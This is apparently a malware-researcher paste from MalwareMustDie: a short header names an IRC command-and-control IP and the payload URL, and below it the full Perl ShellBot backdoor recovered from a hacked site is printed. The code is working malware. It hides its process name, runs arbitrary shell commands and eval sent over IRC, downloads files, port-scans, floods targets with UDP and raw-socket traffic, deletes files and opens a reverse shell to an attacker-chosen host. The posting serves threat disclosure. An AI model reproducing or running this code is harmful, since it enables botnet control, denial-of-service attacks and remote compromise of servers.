Hacked Site with the US IRC Server'S Perl ShellBot

1. # MalwareMustDie!!
2. # Found this evil Perl IRC Shell/Backdoor announced in:
3. # https://twitter.com/unixfreaxjp/status/433629833889714176
4. # CnC is IRC server in 74.208.250.181 is in USA network: u17072928.onlinehome-server.com.|8560 |
5. # 74.208.0.0/16 | ONEANDONE | US | ONEANDONE.NET | 1&1 INTERNET INC.
6. #
7. # PoC of the malicious activity is snipped code below..
8. # Detected: Backdoors, Faking many IRC Clients, HTTP downloader, Port Scanner and DDoS tools
9. #
10. # --- snips / start evidence ----
11.  
12. $ curl http://121.119.182.119/icons/web.is
13.  
14. #!/usr/bin/perl
15. my @mast3rs = ("w","R");
16.  
17. my @hostauth = ("w");
18. my @admchan=("#bug");
19.  
20. my @server = ("74.208.250.181");
21. $servidor= $server[rand scalar @server] unless $servidor;
22.  
23.  
24. my $xeqt = "!";
25. my $homedir = "/tmp";
26. my $shellaccess = 1;
27. my $xstats = 1;
28. my $pacotes = 1;
29. my $linas_max = 5;
30. my $sleep = 6;
31. my $portime = 4;
32.  
33. my @fakeps = ("ps x");
34.  
35. my @nickname = ("LINUX");
36.  
37. my @xident = ("KAST");
38. my @xname = (`uname -a`);
39.  
40. #################
41. # Random Ports
42. #################
43. my @rports = ("6667");
44.  
45. my @Mrx = ("¥001mIRC32 v5.91 K.Mardam-Bey¥001","¥001mIRC v6.2 Khaled Mardam-Bey¥001",
46.    "¥001mIRC v6.03 Khaled Mardam-Bey¥001","¥001mIRC v6.14 Khaled Mardam-Bey¥001",
47.    "¥001mIRC v6.15 Khaled Mardam-Bey¥001","¥001mIRC v6.16 Khaled Mardam-Bey¥001",
48.    "¥001mIRC v6.17 Khaled Mardam-Bey¥001","¥001mIRC v6.21 Khaled Mardam-Bey¥001",
49.    "¥001Snak for Macintosh 4.9.8 English¥001",
50.    "¥001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC¥001",
51.    "¥001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)¥001",
52.    "¥001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]¥001",
53.    "¥001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]¥001",
54.    "¥001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]¥001",
55.    "¥001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]¥001",
56.    "¥001ircN 7.27 + 7.0 - -¥001","¥001..(argon/1g) :bitchx-1.0c17¥001",
57.    "¥001ircN 8.00 - he tries to tell me what I put inside of me -¥001",
58.    "¥001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people¥001",
59.    "¥001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!¥001",
60.    "¥001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!¥001",
61.    "¥001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!¥001",
62.    "¥001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!¥001",
63.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!¥001",
64.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!¥001",
65.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!¥001",
66.    "¥001bitchx-1.0c18 :tunnelvision/1.2¥001","¥001PnP 4.22 - http://www.pairc.com/¥001",
67.    "¥001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1ﾂ?9] : Keep it to yourself!¥001",
68.    "¥001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras¥001",
69.    "¥001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet¥001",
70.    "¥001irssi v0.8.10 - running on Linux i586¥001","¥001irssi v0.8.10 - running on FreeBSD i386¥001",
71.    "¥001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there¥001",
72.    "¥001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there¥001");
73.  
74. # Default quick scan ports
75. my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
76.  
77. # xeQt
78.  
79. #my $nick = "Power";
80. my $nick = $nickname[rand scalar @nickname];
81. my $realname = $xname[rand scalar @xname];
82. my $ircname = $xident[rand scalar @xident];
83. my $porta = $rports[rand scalar @rports];
84. my $xproc = $fakeps[rand scalar @fakeps];
85. my $Mrx = $Mrx[rand scalar @Mrx];
86. my $version = 'PowerBots (C) GohacK';
87.  
88. $SIG{'INT'} = 'IGNORE';
89. $SIG{'HUP'} = 'IGNORE';
90. $SIG{'TERM'} = 'IGNORE';
91. $SIG{'CHLD'} = 'IGNORE';
92. $SIG{'PS'} = 'IGNORE';
93.  
94.  
95. use IO::Socket;
96. use Socket;
97. use IO::Select;
98. chdir("$homedir");
99. $servidor="$ARGV[0]" if $ARGV[0];
100. $0="$xproc"."¥0";
101. my $pid = fork;
102. exit if $pid;
103. die "[x] -> Cannot fork into background: $!" unless defined($pid);
104. my %irc_servers;
105. my %DCC;
106. my $dcc_sel = new IO::Select->new();
107.  
108. sub getnick {
109.   return "$nickname[rand scalar @nickname]".int(rand(20000));
110. }
111.  
112. sub getstore ($$)
113. {
114.   my $url = shift;
115.   my $file = shift;
116.  
117.   $http_stream_out = 1;
118.   open(GET_OUTFILE, "> $file");
119.   %http_loop_check = ();
120.   _get($url);
121.   close GET_OUTFILE;
122.   return $main::http_get_result;
123. }
124. sub _get
125. {
126.   my $url = shift;
127.   my $proxy = "";
128.   grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
129.   if (($proxy eq "") && $url =‾ m,^http://([^/:]+)(?::(¥d+))?(/¥S*)?$,) {
130.     my $host = $1;
131.     my $port = $2 || 80;
132.     my $path = $3;
133.     $path = "/" unless defined($path);
134.     return _trivial_http_get($host, $port, $path);
135.   } elsif ($proxy =‾ m,^http://([^/:]+):(¥d+)(/¥S*)?$,) {
136.     my $host = $1;
137.     my $port = $2;
138.     my $path = $url;
139.     return _trivial_http_get($host, $port, $path);
140.   } else {
141.     return undef;
142.   }
143. }
144. sub _trivial_http_get
145. {
146.   my($host, $port, $path) = @_;
147.   my($AGENT, $VERSION, $p);
148.   #print "HOST=$host, PORT=$port, PATH=$path¥n";
149.  
150.   $AGENT = "get-minimal";
151.   $VERSION = "20000118";
152.  
153.   $path =‾ s/ /%20/g;
154.  
155.   require IO::Socket;
156.   local($^W) = 0;
157.   my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto   => 'tcp', Timeout  => 60) || return;
158.  
159.   $sock->autoflush;
160.   my $netloc = $host;
161.   $netloc .= ":$port" if $port != 80;
162.   my $request = "GET $path HTTP/1.0¥015¥012"
163.               . "Host: $netloc¥015¥012"
164.               . "User-Agent: $AGENT/$VERSION/u¥015¥012";
165.   $request .= "Pragma: no-cache¥015¥012" if ($main::http_no_cache);
166.   $request .= "¥015¥012";
167.   print $sock $request;
168.   my $buf = "";
169.   my $n;
170.   my $b1 = "";
171.   while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
172.     if ($b1 eq "") {
173.       $b1 = $buf;
174.       $buf =‾ s/.+?¥015?¥012¥015?¥012//s;
175.     }
176.     if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
177.   }
178.   return undef unless defined($n);
179.   $main::http_get_result = 200;
180.   if ($b1 =‾ m,^HTTP/¥d+¥.¥d+¥s+(¥d+)[^¥012]*¥012,) {
181.     $main::http_get_result = $1;
182.     # print "CODE=$main::http_get_result¥n$b1¥n";
183.     if ($main::http_get_result =‾ /^30[1237]/ && $b1 =‾ /¥012Location:¥s*(¥S+)/) {
184.       my $url = $1;
185.       return undef if $http_loop_check{$url}++;
186.       return _get($url);
187.     }
188.     return undef unless $main::http_get_result =‾ /^2/;
189.   }
190.   return $buf;
191. }
192. $sel_cliente = IO::Select->new();
193. sub sendraw {
194.   if ($#_ == '1') {
195.     my $socket = $_[0];
196.     print $socket "$_[1]¥n";
197.   } else {
198.       print $IRC_cur_socket "$_[0]¥n";
199.   }
200. }
201. sub conectar {
202.    my $meunick = $_[0];
203.    my $servidor_con = $_[1];
204.    my $porta_con = $_[2];
205.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
206.    if (defined($IRC_socket)) {
207.      $IRC_cur_socket = $IRC_socket;
208.      $IRC_socket->autoflush(1);
209.      $sel_cliente->add($IRC_socket);
210.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
211.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
212.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
213.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
214.      nick("$meunick");
215.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
216.      sleep 2;
217.    }
218. }
219. my $line_temp;
220. while( 1 ) {
221.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
222.    delete($irc_servers{''}) if (defined($irc_servers{''}));
223.    &DCC::connections;
224.    my @ready = $sel_cliente->can_read(0.6);
225.    next unless(@ready);
226.    foreach $fh (@ready) {
227.      $IRC_cur_socket = $fh;
228.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
229.      $nread = sysread($fh, $msg, 4096);
230.      if ($nread == 0) {
231.         $sel_cliente->remove($fh);
232.         $fh->close;
233.         delete($irc_servers{$fh});
234.      }
235.      @lines = split (/¥n/, $msg);
236.      for(my $c=0; $c<= $#lines; $c++) {
237.        $line = $lines[$c];
238.        $line=$line_temp.$line if ($line_temp);
239.        $line_temp='';
240.        $line =‾ s/¥r$//;
241.        unless ($c == $#lines) {
242.          parse("$line");
243.        } else {
244.            if ($#lines == 0) {
245.              parse("$line");
246.            } elsif ($lines[$c] =‾ /¥r$/) {
247.                parse("$line");
248.            } elsif ($line =‾ /^(¥S+) NOTICE AUTH :¥*¥*¥*/) {
249.                parse("$line");
250.            } else {
251.                $line_temp = $line;
252.            }
253.        }
254.       }
255.    }
256. }
257.  
258. sub parse {
259.    my $servarg = shift;
260.    if ($servarg =‾ /^PING ¥:(.*)/) {
261.      sendraw("PONG :$1");
262.    } elsif ($servarg =‾ /^¥:(.+?)¥!(.+?)¥@(.+?) PRIVMSG (.+?) ¥:(.+)/) {
263.        my $pn=$1; my $hostnam3=$3; my $onde = $4; my $args = $5;
264.        if ($args =‾ /^¥001VERSION¥001$/) {
265.          notice("$pn", "".$Mrx."");
266.        }
267.        elsif ($args =‾ /^¥001PING¥s+(¥d+)¥001$/) {
268.          notice("$pn", "¥001PONG¥001");
269.        }
270.        if (grep {$_ =‾ /^¥Q$hostnam3¥E$/i } @hostauth) {
271.        if (grep {$_ =‾ /^¥Q$pn¥E$/i } @mast3rs) {
272.          if ($onde eq "$meunick"){
273.            shell("$pn", "$args");
274.         }
275.     if ($args =‾ /^!(.*)/){
276.        ircase("$pn","$chan","$1");
277.     }
278.         if ($args =‾ /^(¥Q$meunick¥E|¥Q$xeqt¥E)¥s+(.*)/ ) {
279.             my $natrix = $1;
280.             my $arg = $2;
281.             if ($arg =‾ /^¥!(.*)/) {
282.               ircase("$pn","$onde","$1");
283.             } elsif ($arg =‾ /^¥@(.*)/) {
284.                 $ondep = $onde;
285.                 $ondep = $pn if $onde eq $meunick;
286.                 bfunc("$ondep","$1");
287.             } else {
288.                 shell("$onde", "$arg");
289.             }
290.           }
291.         }
292.       }
293.    } elsif ($servarg =‾ /^¥:(.+?)¥!(.+?)¥@(.+?)¥s+NICK¥s+¥:(¥S+)/i) {
294.        if (lc($1) eq lc($meunick)) {
295.          $meunick=$4;
296.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
297.        }
298.    } elsif ($servarg =‾ m/^¥:(.+?)¥s+433/i) {
299.        $meunick = getnick();
300.        nick("".$meunick."-");
301.    } elsif ($servarg =‾ m/^¥:(.+?)¥s+001¥s+(¥S+)¥s/i) {
302.        $meunick = $2;
303.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
304.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
305.        foreach my $canal (@admchan){
306.          sendraw("JOIN $canal muietie");
307.        }
308.    }
309. }
310. sub bfunc {
311.   my $printl = $_[0];
312.   my $funcarg = $_[1];
313.   if (my $pid = fork) {
314.      waitpid($pid, 0);
315.   } else {
316.       if (fork)
317.        {
318.          exit;
319.        }
320.    else
321.    {
322.       # Quick scan
323.            if ($funcarg =‾ /^ps (.*)/) {
324.              my $hostip="$1";
325.         sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312Portscanning¥003¥002: $1 ¥002¥00312Ports:¥003¥002 default");
326.              my (@aberta, %porta_banner);
327.              foreach my $porta (@portas)  {
328.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
329.                 if ($scansock) {
330.                    push (@aberta, $porta);
331.                    $scansock->close;
332.          sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
333.                 }
334.              }
335.              if (@aberta) {
336.                sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 ");
337.              } else {
338.                  sendraw($IRC_cur_socket,"PRIVMSG $printl :¥002[x]¥0034 No open ports found on¥002 $1");
339.              }
340.            }
341.       # NMAP, lol
342.            elsif ($funcarg =‾ /^nmap¥s+(.*)¥s+(¥d+)¥s+(¥d+)/)
343.       {
344.               my $hostname="$1";
345.               my $portstart = "$2";
346.                my $portend = "$3";
347.                my (@abertas, %porta_banner);
348.           sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312xMap Portscanning¥003¥002: $1 ¥002¥00312Ports:¥003¥002 $2-$3");
349.                foreach my $porta ($portstart..$portend)
350.              {
351.                my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
352.                if ($scansock) {
353.                  push (@abertas, $porta);
354.                  $scansock->close;
355.                  if ($xstats)
356.        {
357.                    sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
358.                  }
359.                }
360.              }
361.              if (@abertas) {
362.           sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312Scan Complate¥003¥002");
363.              } else {
364.                sendraw($IRC_cur_socket,"PRIVMSG $printl :¥002¥00312No ports found..¥002");
365.              }
366.             }
367.       # Remove
368.       elsif ($funcarg =‾ /^rm/)
369.       {
370.          system("cd /var/tmp ; rm -rf cb find god* wunder* udev* lib*");
371.       sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Quickdel)¥002¥00314 Removed files and folders ");
372.       }
373.       # Version
374.       elsif ($funcarg =‾ /^version/)
375.       {
376.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Version)¥002¥00314 $version ");
377.       }
378.       # Download
379.            elsif ($funcarg =‾ /^down¥s+(.*)¥s+(.*)/)
380.       {
381.               getstore("$1", "$2");
382.               sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Download)¥002¥00314 Page: $2 (File: $1)") if ($xstats);
383.            }
384.        # Udp
385.             elsif ($funcarg =‾ /^udp¥s+(.*)¥s+(¥d+)¥s+(¥d+)/) {
386.               return unless $pacotes;
387.               socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
388.               my $alvo=inet_aton("$1");
389.               my $porta = "$2";
390.               my $tempo = "$3";
391.               my $pacote;
392.               my $pacotese;
393.               my $fim = time + $tempo;
394.               my $pacota = 1;
395.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(UDP DDoSing)¥003 Attacking¥002: $1 - ¥002Time¥002: $tempo"."seconds");
396.               while (($pacota == "1") && ($pacotes == "1")) {
397.                 $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
398.                 $pacote=$rand x $rand x $rand;
399.                 $porta = int(rand 65000) +1 if ($porta == "0");
400.                 send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
401.               }
402.               if ($xstats)
403.               {
404.                sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(UDP Complete):¥003¥002 $1 - ¥002Sendt¥002: $pacotese"."kb - ¥002Time¥002: $tempo"."seconds");
405.              }
406.             }
407.  
408.        # Backconnect
409.             elsif ($funcarg =‾ /^back¥s+(.*)¥s+(¥d+)/) {
410.               my $host = "$1";
411.               my $porta = "$2";
412.               my $proto = getprotobyname('tcp');
413.               my $iaddr = inet_aton($host);
414.               my $paddr = sockaddr_in($porta, $iaddr);
415.               my $shell = "/bin/sh -i";
416.               if ($^O eq "MSWin32") {
417.                 $shell = "cmd.exe";
418.               }
419.               socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
420.               connect(SOCKET, $paddr) or die "connect: $!";
421.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002[x] ->¥0034 Injection ...");
422.               open(STDIN, ">&SOCKET");
423.               open(STDOUT, ">&SOCKET");
424.               open(STDERR, ">&SOCKET");
425.               system("$shell");
426.          system("cd /tmp/.mrx");
427.               close(STDIN);
428.               close(STDOUT);
429.               close(STDERR);
430.             }
431.            exit;
432.        }
433.   }
434. }
435.  
436. sub ircase {
437.   my ($kem, $printl, $case) = @_;
438.  
439.    if ($case =‾ /^join (.*)/) {
440.      j("$1");
441.    }
442.    elsif ($case =‾ /^part (.*)/) {
443.       p("$1");
444.    }
445.    elsif ($case =‾ /^rejoin¥s+(.*)/) {
446.       my $chan = $1;
447.       if ($chan =‾ /^(¥d+) (.*)/) {
448.         for (my $ca = 1; $ca <= $1; $ca++ ) {
449.           p("$2");
450.           j("$2");
451.         }
452.       } else {
453.           p("$chan");
454.           j("$chan");
455.       }
456.    }
457.    elsif ($case =‾ /^op/) {
458.       op("$printl", "$kem") if $case eq "op";
459.       my $oarg = substr($case, 3);
460.       op("$1", "$2") if ($oarg =‾ /(¥S+)¥s+(¥S+)/);
461.    }
462.    elsif ($case =‾ /^deop/) {
463.       deop("$printl", "$kem") if $case eq "deop";
464.       my $oarg = substr($case, 5);
465.       deop("$1", "$2") if ($oarg =‾ /(¥S+)¥s+(¥S+)/);
466.    }
467.    elsif ($case =‾ /^voice/) {
468.       voice("$printl", "$kem") if $case eq "voice";
469.       $oarg = substr($case, 6);
470.       voice("$1", "$2") if ($oarg =‾ /(¥S+)¥s+(¥S+)/);
471.    }
472.    elsif ($case =‾ /^devoice/) {
473.       devoice("$printl", "$kem") if $case eq "devoice";
474.       $oarg = substr($case, 8);
475.       devoice("$1", "$2") if ($oarg =‾ /(¥S+)¥s+(¥S+)/);
476.    }
477.    elsif ($case =‾ /^msg¥s+(¥S+) (.*)/) {
478.       msg("$1", "$2");
479.    }
480.    elsif ($case =‾ /^flood¥s+(¥d+)¥s+(¥S+) (.*)/) {
481.       for (my $cf = 1; $cf <= $1; $cf++) {
482.         msg("$2", "$3");
483.       }
484.    }
485.    elsif ($case =‾ /^ctcpflood¥s+(¥d+)¥s+(¥S+) (.*)/) {
486.       for (my $cf = 1; $cf <= $1; $cf++) {
487.         ctcp("$2", "$3");
488.       }
489.    }
490.    elsif ($case =‾ /^ctcp¥s+(¥S+) (.*)/) {
491.       ctcp("$1", "$2");
492.    }
493.    elsif ($case =‾ /^invite¥s+(¥S+) (.*)/) {
494.       invite("$1", "$2");
495.    }
496.    elsif ($case =‾ /^nick (.*)/) {
497.       nick("$1");
498.    }
499.    elsif ($case =‾ /^jump¥s+(¥S+)¥s+(¥S+)/) {
500.        conectar("$2", "$1", 6667);
501.    }
502.    elsif ($case =‾ /^send¥s+(¥S+)¥s+(¥S+)/) {
503.       DCC::SEND("$1", "$2");
504.    }
505.    elsif ($case =‾ /^raw (.*)/) {
506.       sendraw("$1");
507.    }
508.    elsif ($case =‾ /^eval (.*)/) {
509.       eval "$1";
510.    }
511.    elsif ($case =‾ /^rj¥s+(¥S+)¥s+(¥d+)/) {
512.     sleep int(rand($2));
513.     j("$1");
514.    }
515.    elsif ($case =‾ /^rp¥s+(¥S+)¥s+(¥d+)/) {
516.     sleep int(rand($2));
517.     p("$1");
518.    }
519.    elsif ($case =‾ /^quit/) {
520.      quit();
521.    }
522.    elsif ($case =‾ /^rand/) {
523.     my $novonick = getnick();
524.      nick("$novonick");
525.    }
526.    elsif ($case =‾ /^stat (.*)/) {
527.      if ($1 eq "on") {
528.       $xstats = 1;
529.       msg("$printl", "Satus enabled");
530.      } elsif ($1 eq "off") {
531.       $xstats = 0;
532.       msg("$printl", "Status disable");
533.      }
534.    }
535.    elsif ($case =‾ /^bang (.*)/) {
536.      if ($1 eq "on") {
537.       $pacotes = 1;
538.       msg("$printl", "[x] Bang mode enabled") if ($xstats == "1");
539.      } elsif ($1 eq "off") {
540.       $pacotes = 0;
541.       msg("$printl", "[x] Bang mode disabled") if ($xstats == "1");
542.      }
543.    }
544. }
545. sub shell {
546.   return unless $shellaccess;
547.   my $printl=$_[0];
548.   my $comando=$_[1];
549.   if ($comando =‾ /cd (.*)/) {
550.     chdir("$1") || msg("$printl", "cd: $1".": No such file or directory");
551.     return;
552.   }
553.   elsif ($pid = fork) {
554.      waitpid($pid, 0);
555.   } else {
556.       if (fork) {
557.          exit;
558.        } else {
559.            my @resp=`$comando 2>&1 3>&1`;
560.            my $c=0;
561.            foreach my $linha (@resp) {
562.              $c++;
563.              chop $linha;
564.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
565.              if ($c >= "$linas_max") {
566.                $c=0;
567.                sleep $sleep;
568.              }
569.            }
570.            exit;
571.        }
572.   }
573. }
574.  
575. sub attacker {
576.   my $iaddr = inet_aton($_[0]);
577.   my $msg = 'B' x $_[1];
578.   my $ftime = $_[2];
579.   my $cp = 0;
580.   my (%pacotes);
581.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
582.  
583.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
584.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
585.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
586.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
587.   return(undef) if $cp == 4;
588.   my $itime = time;
589.   my ($cur_time);
590.   while ( 1 ) {
591.      for (my $porta = 1; $porta <= 65535; $porta++) {
592.        $cur_time = time - $itime;
593.        last if $cur_time >= $ftime;
594.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
595.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
596.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
597.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
598.        for (my $pc = 3; $pc <= 255;$pc++) {
599.          next if $pc == 6;
600.          $cur_time = time - $itime;
601.          last if $cur_time >= $ftime;
602.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
603.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
604.        }
605.      }
606.      last if $cur_time >= $ftime;
607.   }
608.   return($cur_time, %pacotes);
609. }
610.  
611. sub action {
612.    return unless $#_ == 1;
613.    sendraw("PRIVMSG $_[0] :¥001ACTION $_[1]¥001");
614. }
615. sub ctcp {
616.    return unless $#_ == 1;
617.    sendraw("PRIVMSG $_[0] :¥001$_[1]¥001");
618. }
619. sub msg {
620.    return unless $#_ == 1;
621.    sendraw("PRIVMSG $_[0] :$_[1]");
622. }
623. sub notice {
624.    return unless $#_ == 1;
625.    sendraw("NOTICE $_[0] :$_[1]");
626. }
627. sub op {
628.    return unless $#_ == 1;
629.    sendraw("MODE $_[0] +o $_[1]");
630. }
631. sub deop {
632.    return unless $#_ == 1;
633.    sendraw("MODE $_[0] -o $_[1]");
634. }
635. sub hop {
636.     return unless $#_ == 1;
637.    sendraw("MODE $_[0] +h $_[1]");
638. }
639. sub dehop {
640.    return unless $#_ == 1;
641.    sendraw("MODE $_[0] +h $_[1]");
642. }
643. sub voice {
644.    return unless $#_ == 1;
645.    sendraw("MODE $_[0] +v $_[1]");
646. }
647. sub devoice {
648.    return unless $#_ == 1;
649.    sendraw("MODE $_[0] -v $_[1]");
650. }
651. sub ban {
652.    return unless $#_ == 1;
653.    sendraw("MODE $_[0] +b $_[1]");
654. }
655. sub unban {
656.    return unless $#_ == 1;
657.    sendraw("MODE $_[0] -b $_[1]");
658. }
659. sub kick {
660.    return unless $#_ == 1;
661.    sendraw("KICK $_[0] $_[1] :$_[2]");
662. }
663. sub modo {
664.    return unless $#_ == 0;
665.    sendraw("MODE $_[0] $_[1]");
666. }
667. sub mode { modo(@_); }
668. sub j { &join(@_); }
669. sub join {
670.    return unless $#_ == 0;
671.    sendraw("JOIN $_[0]");
672. }
673. sub p { part(@_); }
674. sub part {sendraw("PART $_[0]");}
675. sub nick {
676.   return unless $#_ == 0;
677.   sendraw("NICK $_[0]");
678. }
679. sub invite {
680.    return unless $#_ == 1;
681.    sendraw("INVITE $_[1] $_[0]");
682. }
683. sub topico {
684.    return unless $#_ == 1;
685.    sendraw("TOPIC $_[0] $_[1]");
686. }
687. sub topic { topico(@_); }
688. sub whois {
689.   return unless $#_ == 0;
690.   sendraw("WHOIS $_[0]");
691. }
692. sub who {
693.   return unless $#_ == 0;
694.   sendraw("WHO $_[0]");
695. }
696. sub names {
697.   return unless $#_ == 0;
698.   sendraw("NAMES $_[0]");
699. }
700. sub away {
701.   sendraw("AWAY $_[0]");
702. }
703. sub back { away(); }
704. sub quit {
705.   sendraw("QUIT :$_[0]");
706.   exit;
707. }
708.  
709. package DCC;
710. sub connections {
711.    my @ready = $dcc_sel->can_read(1);
712. #   return unless (@ready);
713.    foreach my $fh (@ready) {
714.      my $dcctipo = $DCC{$fh}{tipo};
715.      my $arquivo = $DCC{$fh}{arquivo};
716.      my $bytes = $DCC{$fh}{bytes};
717.      my $cur_byte = $DCC{$fh}{curbyte};
718.      my $nick = $DCC{$fh}{nick};
719.      my $msg;
720.      my $nread = sysread($fh, $msg, 10240);
721.      if ($nread == 0 and $dcctipo =‾ /^(get|sendcon)$/) {
722.         $DCC{$fh}{status} = "Cancelado";
723.         $DCC{$fh}{ftime} = time;
724.         $dcc_sel->remove($fh);
725.         $fh->close;
726.         next;
727.      }
728.      if ($dcctipo eq "get") {
729.         $DCC{$fh}{curbyte} += length($msg);
730.  
731.         my $cur_byte = $DCC{$fh}{curbyte};
732.  
733.         open(FILE, ">> $arquivo");
734.         print FILE "$msg" if ($cur_byte <= $bytes);
735.         close(FILE);
736.  
737.         my $packbyte = pack("N", $cur_byte);
738.         print $fh "$packbyte";
739.  
740.         if ($bytes == $cur_byte) {
741.            $dcc_sel->remove($fh);
742.            $fh->close;
743.            $DCC{$fh}{status} = "Recebido";
744.            $DCC{$fh}{ftime} = time;
745.            next;
746.         }
747.      } elsif ($dcctipo eq "send") {
748.           my $send = $fh->accept;
749.           $send->autoflush(1);
750.           $dcc_sel->add($send);
751.           $dcc_sel->remove($fh);
752.           $DCC{$send}{tipo} = 'sendcon';
753.           $DCC{$send}{itime} = time;
754.           $DCC{$send}{nick} = $nick;
755.           $DCC{$send}{bytes} = $bytes;
756.           $DCC{$send}{curbyte} = 0;
757.           $DCC{$send}{arquivo} = $arquivo;
758.           $DCC{$send}{ip} = $send->peerhost;
759.           $DCC{$send}{porta} = $send->peerport;
760.           $DCC{$send}{status} = "Enviando";
761.           open(FILE, "< $arquivo");
762.           my $fbytes;
763.           read(FILE, $fbytes, 1024);
764.           print $send "$fbytes";
765.           close FILE;
766. #          delete($DCC{$fh});
767.      } elsif ($dcctipo eq 'sendcon') {
768.           my $bytes_sended = unpack("N", $msg);
769.           $DCC{$fh}{curbyte} = $bytes_sended;
770.           if ($bytes_sended == $bytes) {
771.              $fh->close;
772.              $dcc_sel->remove($fh);
773.              $DCC{$fh}{status} = "Enviado";
774.              $DCC{$fh}{ftime} = time;
775.              next;
776.           }
777.           open(SENDFILE, "< $arquivo");
778.           seek(SENDFILE, $bytes_sended, 0);
779.           my $send_bytes;
780.           read(SENDFILE, $send_bytes, 1024);
781.           print $fh "$send_bytes";
782.           close(SENDFILE);
783.      }
784.    }
785. }
786.  
787. sub SEND {
788.   my ($nick, $arquivo) = @_;
789.   unless (-r "$arquivo") {
790.     return(0);
791.   }
792.   my $dccark = $arquivo;
793.   $dccark =‾ s/[.*¥/](¥S+)/$1/;
794.   my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
795.   my $longip = unpack("N",inet_aton($meuip));
796.   my @filestat = stat($arquivo);
797.   my $size_total=$filestat[7];
798.   if ($size_total == 0) {
799.      return(0);
800.   }
801.   my ($porta, $sendsock);
802.   do {
803.     $porta = int rand(64511);
804.     $porta += 1024;
805.     $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
806.   } until $sendsock;
807.   $DCC{$sendsock}{tipo} = 'send';
808.   $DCC{$sendsock}{nick} = $nick;
